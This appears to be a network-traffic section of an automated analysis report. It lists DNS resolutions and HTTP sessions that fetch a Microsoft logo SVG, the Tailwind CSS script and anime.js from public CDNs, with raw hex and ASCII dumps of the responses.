Dec 20, 2024 13:46:32.138811111 CET	1.1.1.1	192.168.2.5	0x6a5c	No error (0)	scdn38e6f.wpc.9be8f.omegacdn.net	sni1gl.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:32.138811111 CET	1.1.1.1	192.168.2.5	0x6a5c	No error (0)	sni1gl.wpc.omegacdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:32.396663904 CET	1.1.1.1	192.168.2.5	0x8496	No error (0)	aadcdn.msftauth.net	scdn38e6f.wpc.9be8f.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:32.396663904 CET	1.1.1.1	192.168.2.5	0x8496	No error (0)	scdn38e6f.wpc.9be8f.omegacdn.net	sni1gl.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:33.911253929 CET	1.1.1.1	192.168.2.5	0xeb6c	No error (0)	cdn.jsdelivr.net	jsdelivr.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:33.911253929 CET	1.1.1.1	192.168.2.5	0xeb6c	No error (0)	jsdelivr.map.fastly.net		151.101.1.229	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:33.911253929 CET	1.1.1.1	192.168.2.5	0xeb6c	No error (0)	jsdelivr.map.fastly.net		151.101.65.229	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:33.911253929 CET	1.1.1.1	192.168.2.5	0xeb6c	No error (0)	jsdelivr.map.fastly.net		151.101.129.229	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:33.911253929 CET	1.1.1.1	192.168.2.5	0xeb6c	No error (0)	jsdelivr.map.fastly.net		151.101.193.229	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:34.054513931 CET	1.1.1.1	192.168.2.5	0xf635	No error (0)	cdn.jsdelivr.net	cdn.jsdelivr.net.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:34.641905069 CET	1.1.1.1	192.168.2.5	0x6944	No error (0)	aadcdn.msftauth.net	scdn38e6f.wpc.9be8f.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:34.641905069 CET	1.1.1.1	192.168.2.5	0x6944	No error (0)	scdn38e6f.wpc.9be8f.omegacdn.net	sni1gl.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:34.641977072 CET	1.1.1.1	192.168.2.5	0x876b	No error (0)	aadcdn.msftauth.net	scdn38e6f.wpc.9be8f.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:34.641977072 CET	1.1.1.1	192.168.2.5	0x876b	No error (0)	scdn38e6f.wpc.9be8f.omegacdn.net	sni1gl.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:34.641977072 CET	1.1.1.1	192.168.2.5	0x876b	No error (0)	sni1gl.wpc.omegacdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:36.118252039 CET	1.1.1.1	192.168.2.5	0xd14e	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 20, 2024 13:46:36.124290943 CET	1.1.1.1	192.168.2.5	0x2eea	No error (0)	www.google.com		142.250.181.132	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:36.651227951 CET	1.1.1.1	192.168.2.5	0x5166	No error (0)	cdn.tailwindcss.com		172.67.41.16	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:36.651227951 CET	1.1.1.1	192.168.2.5	0x5166	No error (0)	cdn.tailwindcss.com		104.22.21.144	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:36.651227951 CET	1.1.1.1	192.168.2.5	0x5166	No error (0)	cdn.tailwindcss.com		104.22.20.144	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:36.652112007 CET	1.1.1.1	192.168.2.5	0x33cd	No error (0)	cdn.tailwindcss.com			65	IN (0x0001)	false
Dec 20, 2024 13:46:36.799726963 CET	1.1.1.1	192.168.2.5	0x3cd5	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:36.799726963 CET	1.1.1.1	192.168.2.5	0x3cd5	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:39.157120943 CET	1.1.1.1	192.168.2.5	0xe9bc	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:39.157120943 CET	1.1.1.1	192.168.2.5	0xe9bc	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:39.289653063 CET	1.1.1.1	192.168.2.5	0xdebe	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:39.289653063 CET	1.1.1.1	192.168.2.5	0xdebe	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:41.527712107 CET	1.1.1.1	192.168.2.5	0x4cc7	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 13:46:41.527712107 CET	1.1.1.1	192.168.2.5	0x4cc7	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 20, 2024 13:46:48.135077000 CET	1.1.1.1	192.168.2.5	0x8dbd	No error (0)	docs.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-12-20 12:46:33 UTC	483	OUT	GET / HTTP/1.1 Host: cdn.tailwindcss.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 12:46:33 UTC	363	IN	HTTP/1.1 302 Found Date: Fri, 20 Dec 2024 12:46:33 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=14400 location: /3.4.16 strict-transport-security: max-age=63072000 x-vercel-cache: MISS x-vercel-id: cle1::iad1::f8mg4-1734698368081-571159fccaa7 CF-Cache-Status: HIT Age: 273 Server: cloudflare CF-RAY: 8f4fbc642dcac339-EWR
2024-12-20 12:46:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-20 12:46:33 UTC	620	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 12:46:34 UTC	738	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 23439917 Cache-Control: public, max-age=31536000 Content-MD5: nzaLxFgP7ZB3dfMcaybWzw== Content-Type: image/svg+xml Date: Fri, 20 Dec 2024 12:46:34 GMT Etag: 0x8DB5C3F495F4B8C Last-Modified: Wed, 24 May 2023 10:11:48 GMT Server: ECAcc (lhc/7892) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 002cd9d5-201e-00e1-69ad-7d6453000000 x-ms-version: 2009-09-19 Content-Length: 3651 Connection: close
2024-12-20 12:46:34 UTC	3651	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0

Timestamp	Bytes transferred	Direction	Data
2024-12-20 12:46:35 UTC	489	OUT	GET /3.4.16 HTTP/1.1 Host: cdn.tailwindcss.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 12:46:35 UTC	424	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 12:46:35 GMT Content-Type: text/javascript Transfer-Encoding: chunked Connection: close Cache-Control: max-age=31536000 strict-transport-security: max-age=63072000 x-vercel-cache: MISS x-vercel-id: cle1::iad1::rv4dn-1733520637303-9c55b126e284 Last-Modified: Fri, 06 Dec 2024 21:30:37 GMT CF-Cache-Status: HIT Age: 128423 Server: cloudflare CF-RAY: 8f4fbc6ed8ed8cb4-EWR
2024-12-20 12:46:35 UTC	945	IN	Data Raw: 37 64 66 37 0d 0a 28 28 29 3d 3e 7b 76 61 72 20 71 76 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3b 76 61 72 20 48 69 3d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3b 76 61 72 20 24 76 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 3b 76 61 72 20 4c 76 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 3b 76 61 72 20 4d 76 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 4e 76 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 76 61 72 20 64 66 3d 72 3d 3e 48 69 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 76 61 72 20 68 66 3d 72 3d 3e 7b 69 66 28 74 79 Data Ascii: 7df7(()=>{var qv=Object.create;var Hi=Object.defineProperty;var $v=Object.getOwnPropertyDescriptor;var Lv=Object.getOwnPropertyNames;var Mv=Object.getPrototypeOf,Nv=Object.prototype.hasOwnProperty;var df=r=>Hi(r,"__esModule",{value:!0});var hf=r=>{if(ty
2024-12-20 12:46:35 UTC	1369	IN	Data Raw: 72 65 61 64 46 69 6c 65 53 79 6e 63 3a 72 3d 3e 73 65 6c 66 5b 72 5d 7c 7c 22 22 2c 73 74 61 74 53 79 6e 63 3a 28 29 3d 3e 28 7b 6d 74 69 6d 65 4d 73 3a 46 76 2b 2b 7d 29 2c 70 72 6f 6d 69 73 65 73 3a 7b 72 65 61 64 46 69 6c 65 3a 72 3d 3e 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 65 6c 66 5b 72 5d 7c 7c 22 22 29 7d 7d 7d 29 3b 76 61 72 20 46 73 3d 78 28 28 6f 50 2c 67 66 29 3d 3e 7b 75 28 29 3b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6d 66 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 3d 7b 7d 29 7b 69 66 28 21 28 65 2e 6d 61 78 53 69 7a 65 26 26 65 2e 6d 61 78 53 69 7a 65 3e 30 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 60 6d 61 78 53 69 7a 65 60 20 6d 75 73 74 20 62 65 20 61 20 6e 75 6d 62 65 Data Ascii: readFileSync:r=>self[r]\|\|"",statSync:()=>({mtimeMs:Fv++}),promises:{readFile:r=>Promise.resolve(self[r]\|\|"")}}});var Fs=x((oP,gf)=>{u();"use strict";var mf=class{constructor(e={}){if(!(e.maxSize&&e.maxSize>0))throw new TypeError("`maxSize` must be a numbe
2024-12-20 12:46:35 UTC	1369	IN	Data Raw: 6c 65 74 65 49 66 45 78 70 69 72 65 64 28 74 2c 69 29 3d 3d 3d 21 31 26 26 28 79 69 65 6c 64 20 65 29 7d 7d 67 65 74 28 65 29 7b 69 66 28 74 68 69 73 2e 63 61 63 68 65 2e 68 61 73 28 65 29 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 63 61 63 68 65 2e 67 65 74 28 65 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 56 61 6c 75 65 28 65 2c 74 29 7d 69 66 28 74 68 69 73 2e 6f 6c 64 43 61 63 68 65 2e 68 61 73 28 65 29 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 6f 6c 64 43 61 63 68 65 2e 67 65 74 28 65 29 3b 69 66 28 74 68 69 73 2e 5f 64 65 6c 65 74 65 49 66 45 78 70 69 72 65 64 28 65 2c 74 29 3d 3d 3d 21 31 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6d 6f 76 65 54 6f 52 65 63 65 6e 74 28 65 2c 74 29 2c 74 2e 76 61 6c 75 65 7d 7d 73 65 74 28 65 2c 74 2c Data Ascii: leteIfExpired(t,i)===!1&&(yield e)}}get(e){if(this.cache.has(e)){let t=this.cache.get(e);return this._getItemValue(e,t)}if(this.oldCache.has(e)){let t=this.oldCache.get(e);if(this._deleteIfExpired(e,t)===!1)return this._moveToRecent(e,t),t.value}}set(e,t,
2024-12-20 12:46:35 UTC	1369	IN	Data Raw: 74 68 69 73 2e 63 61 63 68 65 2e 68 61 73 28 74 29 7c 7c 74 68 69 73 2e 5f 64 65 6c 65 74 65 49 66 45 78 70 69 72 65 64 28 74 2c 69 29 3d 3d 3d 21 31 26 26 28 79 69 65 6c 64 5b 74 2c 69 2e 76 61 6c 75 65 5d 29 7d 7d 2a 65 6e 74 72 69 65 73 44 65 73 63 65 6e 64 69 6e 67 28 29 7b 6c 65 74 20 65 3d 5b 2e 2e 2e 74 68 69 73 2e 63 61 63 68 65 5d 3b 66 6f 72 28 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 68 2d 31 3b 74 3e 3d 30 3b 2d 2d 74 29 7b 6c 65 74 20 69 3d 65 5b 74 5d 2c 5b 6e 2c 73 5d 3d 69 3b 74 68 69 73 2e 5f 64 65 6c 65 74 65 49 66 45 78 70 69 72 65 64 28 6e 2c 73 29 3d 3d 3d 21 31 26 26 28 79 69 65 6c 64 5b 6e 2c 73 2e 76 61 6c 75 65 5d 29 7d 65 3d 5b 2e 2e 2e 74 68 69 73 2e 6f 6c 64 43 61 63 68 65 5d 3b 66 6f 72 28 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 Data Ascii: this.cache.has(t)\|\|this._deleteIfExpired(t,i)===!1&&(yield[t,i.value])}}*entriesDescending(){let e=[...this.cache];for(let t=e.length-1;t>=0;--t){let i=e[t],[n,s]=i;this._deleteIfExpired(n,s)===!1&&(yield[n,s.value])}e=[...this.oldCache];for(let t=e.lengt
2024-12-20 12:46:35 UTC	1369	IN	Data Raw: 78 22 2c 22 66 6c 65 78 53 68 72 69 6e 6b 22 2c 22 66 6c 65 78 47 72 6f 77 22 2c 22 66 6c 65 78 42 61 73 69 73 22 2c 22 74 61 62 6c 65 4c 61 79 6f 75 74 22 2c 22 63 61 70 74 69 6f 6e 53 69 64 65 22 2c 22 62 6f 72 64 65 72 43 6f 6c 6c 61 70 73 65 22 2c 22 62 6f 72 64 65 72 53 70 61 63 69 6e 67 22 2c 22 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 22 2c 22 74 72 61 6e 73 6c 61 74 65 22 2c 22 72 6f 74 61 74 65 22 2c 22 73 6b 65 77 22 2c 22 73 63 61 6c 65 22 2c 22 74 72 61 6e 73 66 6f 72 6d 22 2c 22 61 6e 69 6d 61 74 69 6f 6e 22 2c 22 63 75 72 73 6f 72 22 2c 22 74 6f 75 63 68 41 63 74 69 6f 6e 22 2c 22 75 73 65 72 53 65 6c 65 63 74 22 2c 22 72 65 73 69 7a 65 22 2c 22 73 63 72 6f 6c 6c 53 6e 61 70 54 79 70 65 22 2c 22 73 63 72 6f 6c 6c 53 6e 61 70 41 6c 69 67 Data Ascii: x","flexShrink","flexGrow","flexBasis","tableLayout","captionSide","borderCollapse","borderSpacing","transformOrigin","translate","rotate","skew","scale","transform","animation","cursor","touchAction","userSelect","resize","scrollSnapType","scrollSnapAlig
2024-12-20 12:46:35 UTC	1369	IN	Data Raw: 22 2c 22 74 65 78 74 4f 70 61 63 69 74 79 22 2c 22 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 22 2c 22 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 43 6f 6c 6f 72 22 2c 22 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 53 74 79 6c 65 22 2c 22 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 54 68 69 63 6b 6e 65 73 73 22 2c 22 74 65 78 74 55 6e 64 65 72 6c 69 6e 65 4f 66 66 73 65 74 22 2c 22 66 6f 6e 74 53 6d 6f 6f 74 68 69 6e 67 22 2c 22 70 6c 61 63 65 68 6f 6c 64 65 72 43 6f 6c 6f 72 22 2c 22 70 6c 61 63 65 68 6f 6c 64 65 72 4f 70 61 63 69 74 79 22 2c 22 63 61 72 65 74 43 6f 6c 6f 72 22 2c 22 61 63 63 65 6e 74 43 6f 6c 6f 72 22 2c 22 6f 70 61 63 69 74 79 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 42 6c 65 6e 64 4d 6f 64 65 22 2c 22 6d 69 78 42 6c 65 6e 64 4d 6f 64 65 22 2c Data Ascii: ","textOpacity","textDecoration","textDecorationColor","textDecorationStyle","textDecorationThickness","textUnderlineOffset","fontSmoothing","placeholderColor","placeholderOpacity","caretColor","accentColor","opacity","backgroundBlendMode","mixBlendMode",
2024-12-20 12:46:35 UTC	1369	IN	Data Raw: 61 79 2e 69 73 41 72 72 61 79 28 72 29 3f 5b 72 5d 3a 5b 65 2c 72 5d 29 7d 2c 77 61 72 6e 28 72 2c 65 29 7b 5b 22 63 6f 6e 74 65 6e 74 2d 70 72 6f 62 6c 65 6d 73 22 5d 2e 69 6e 63 6c 75 64 65 73 28 72 29 7c 7c 6a 73 28 51 65 2e 62 6f 6c 64 28 51 65 2e 79 65 6c 6c 6f 77 28 22 77 61 72 6e 22 29 29 2c 2e 2e 2e 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 72 29 3f 5b 72 5d 3a 5b 65 2c 72 5d 29 7d 2c 72 69 73 6b 28 72 2c 65 29 7b 6a 73 28 51 65 2e 62 6f 6c 64 28 51 65 2e 6d 61 67 65 6e 74 61 28 22 72 69 73 6b 22 29 29 2c 2e 2e 2e 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 72 29 3f 5b 72 5d 3a 5b 65 2c 72 5d 29 7d 7d 7d 29 3b 76 61 72 20 5f 66 3d 7b 7d 3b 47 65 28 5f 66 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 55 73 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 71 72 28 7b Data Ascii: ay.isArray(r)?[r]:[e,r])},warn(r,e){["content-problems"].includes(r)\|\|js(Qe.bold(Qe.yellow("warn")),...Array.isArray(r)?[r]:[e,r])},risk(r,e){js(Qe.bold(Qe.magenta("risk")),...Array.isArray(r)?[r]:[e,r])}}});var _f={};Ge(_f,{default:()=>Us});function qr({
2024-12-20 12:46:35 UTC	1369	IN	Data Raw: 3a 22 23 66 65 66 32 66 32 22 2c 31 30 30 3a 22 23 66 65 65 32 65 32 22 2c 32 30 30 3a 22 23 66 65 63 61 63 61 22 2c 33 30 30 3a 22 23 66 63 61 35 61 35 22 2c 34 30 30 3a 22 23 66 38 37 31 37 31 22 2c 35 30 30 3a 22 23 65 66 34 34 34 34 22 2c 36 30 30 3a 22 23 64 63 32 36 32 36 22 2c 37 30 30 3a 22 23 62 39 31 63 31 63 22 2c 38 30 30 3a 22 23 39 39 31 62 31 62 22 2c 39 30 30 3a 22 23 37 66 31 64 31 64 22 2c 39 35 30 3a 22 23 34 35 30 61 30 61 22 7d 2c 6f 72 61 6e 67 65 3a 7b 35 30 3a 22 23 66 66 66 37 65 64 22 2c 31 30 30 3a 22 23 66 66 65 64 64 35 22 2c 32 30 30 3a 22 23 66 65 64 37 61 61 22 2c 33 30 30 3a 22 23 66 64 62 61 37 34 22 2c 34 30 30 3a 22 23 66 62 39 32 33 63 22 2c 35 30 30 3a 22 23 66 39 37 33 31 36 22 2c 36 30 30 3a 22 23 65 61 35 38 30 63 Data Ascii: :"#fef2f2",100:"#fee2e2",200:"#fecaca",300:"#fca5a5",400:"#f87171",500:"#ef4444",600:"#dc2626",700:"#b91c1c",800:"#991b1b",900:"#7f1d1d",950:"#450a0a"},orange:{50:"#fff7ed",100:"#ffedd5",200:"#fed7aa",300:"#fdba74",400:"#fb923c",500:"#f97316",600:"#ea580c
2024-12-20 12:46:35 UTC	1369	IN	Data Raw: 2c 36 30 30 3a 22 23 30 38 39 31 62 32 22 2c 37 30 30 3a 22 23 30 65 37 34 39 30 22 2c 38 30 30 3a 22 23 31 35 35 65 37 35 22 2c 39 30 30 3a 22 23 31 36 34 65 36 33 22 2c 39 35 30 3a 22 23 30 38 33 33 34 34 22 7d 2c 73 6b 79 3a 7b 35 30 3a 22 23 66 30 66 39 66 66 22 2c 31 30 30 3a 22 23 65 30 66 32 66 65 22 2c 32 30 30 3a 22 23 62 61 65 36 66 64 22 2c 33 30 30 3a 22 23 37 64 64 33 66 63 22 2c 34 30 30 3a 22 23 33 38 62 64 66 38 22 2c 35 30 30 3a 22 23 30 65 61 35 65 39 22 2c 36 30 30 3a 22 23 30 32 38 34 63 37 22 2c 37 30 30 3a 22 23 30 33 36 39 61 31 22 2c 38 30 30 3a 22 23 30 37 35 39 38 35 22 2c 39 30 30 3a 22 23 30 63 34 61 36 65 22 2c 39 35 30 3a 22 23 30 38 32 66 34 39 22 7d 2c 62 6c 75 65 3a 7b 35 30 3a 22 23 65 66 66 36 66 66 22 2c 31 30 30 3a 22 Data Ascii: ,600:"#0891b2",700:"#0e7490",800:"#155e75",900:"#164e63",950:"#083344"},sky:{50:"#f0f9ff",100:"#e0f2fe",200:"#bae6fd",300:"#7dd3fc",400:"#38bdf8",500:"#0ea5e9",600:"#0284c7",700:"#0369a1",800:"#075985",900:"#0c4a6e",950:"#082f49"},blue:{50:"#eff6ff",100:"
2024-12-20 12:46:35 UTC	1369	IN	Data Raw: 42 6c 75 65 28 29 7b 72 65 74 75 72 6e 20 71 72 28 7b 76 65 72 73 69 6f 6e 3a 22 76 32 2e 32 22 2c 66 72 6f 6d 3a 22 6c 69 67 68 74 42 6c 75 65 22 2c 74 6f 3a 22 73 6b 79 22 7d 29 2c 74 68 69 73 2e 73 6b 79 7d 2c 67 65 74 20 77 61 72 6d 47 72 61 79 28 29 7b 72 65 74 75 72 6e 20 71 72 28 7b 76 65 72 73 69 6f 6e 3a 22 76 33 2e 30 22 2c 66 72 6f 6d 3a 22 77 61 72 6d 47 72 61 79 22 2c 74 6f 3a 22 73 74 6f 6e 65 22 7d 29 2c 74 68 69 73 2e 73 74 6f 6e 65 7d 2c 67 65 74 20 74 72 75 65 47 72 61 79 28 29 7b 72 65 74 75 72 6e 20 71 72 28 7b 76 65 72 73 69 6f 6e 3a 22 76 33 2e 30 22 2c 66 72 6f 6d 3a 22 74 72 75 65 47 72 61 79 22 2c 74 6f 3a 22 6e 65 75 74 72 61 6c 22 7d 29 2c 74 68 69 73 2e 6e 65 75 74 72 61 6c 7d 2c 67 65 74 20 63 6f 6f 6c 47 72 61 79 28 29 7b 72 Data Ascii: Blue(){return qr({version:"v2.2",from:"lightBlue",to:"sky"}),this.sky},get warmGray(){return qr({version:"v3.0",from:"warmGray",to:"stone"}),this.stone},get trueGray(){return qr({version:"v3.0",from:"trueGray",to:"neutral"}),this.neutral},get coolGray(){r

Timestamp	Bytes transferred	Direction	Data
2024-12-20 12:46:35 UTC	374	OUT	GET /npm/animejs@3.2.2/lib/anime.min.js HTTP/1.1 Host: cdn.jsdelivr.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-20 12:46:35 UTC	775	IN	HTTP/1.1 200 OK Connection: close Content-Length: 17384 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Timing-Allow-Origin: * Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable Cross-Origin-Resource-Policy: cross-origin X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Type: application/javascript; charset=utf-8 X-JSD-Version: 3.2.2 X-JSD-Version-Type: version ETag: W/"43e8-Znd/luYBWv7yja3LqDVBe3VEe8w" Accept-Ranges: bytes Age: 175012 Date: Fri, 20 Dec 2024 12:46:35 GMT X-Served-By: cache-fra-etou8220089-FRA, cache-ewr-kewr1740044-EWR X-Cache: HIT, MISS Vary: Accept-Encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-12-20 12:46:35 UTC	1378	IN	Data Raw: 2f 2a 0a 20 2a 20 61 6e 69 6d 65 2e 6a 73 20 76 33 2e 32 2e 32 0a 20 2a 20 28 63 29 20 32 30 32 33 20 4a 75 6c 69 61 6e 20 47 61 72 6e 69 65 72 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 61 6e 69 6d 65 6a 73 2e 63 6f 6d 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 6e 2e 61 6e 69 6d 65 3d 65 28 29 7d 28 74 68 69 73 Data Ascii: /* * anime.js v3.2.2 * (c) 2023 Julian Garnier * Released under the MIT license * animejs.com */!function(n,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):n.anime=e()}(this
